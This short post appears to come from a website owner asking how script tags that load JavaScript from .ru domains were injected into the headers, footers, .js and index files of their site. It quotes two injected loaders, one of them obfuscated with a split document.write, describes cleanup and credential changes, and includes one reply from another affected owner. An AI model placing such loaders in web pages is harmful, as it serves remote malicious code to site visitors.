Malicious script from Russia? Attached to footer and headers from .ru 1


<script type=”text/javascript” src = ”   h t t p :// dayemai l. r u / O D B C . j s     ” ></script>
<!–152c94876570afa40bdec03b3abf7d64–>

and another script:

document.write(‘<sc’+’ript type=”text/javascript” src=”h t t   p : / /  starvingarctic. r u/ O D B C . j s “> </scri’+’pt>’);

*** POTENTIALLY DANGEROUS LINK DO NOT VISIT ***

Does anyone know where or how these scripts are getting or attached to .js files, default.  and index. or indexxxx.xxx  files. It appears to be some kind of malicious link from Russia..

Im noticing this script being inserted in the header and footer of pages. The culprit scripts can be found in .js files and index files.

I’ve had to manually remove them, updated my ftp un/pw and also my WP and SMF forum un/pw.

Share

Leave a comment

One thought on “Malicious script from Russia? Attached to footer and headers from .ru

  • jonsmith

    Even i got the same kind of script on my website

    did some googling and landed here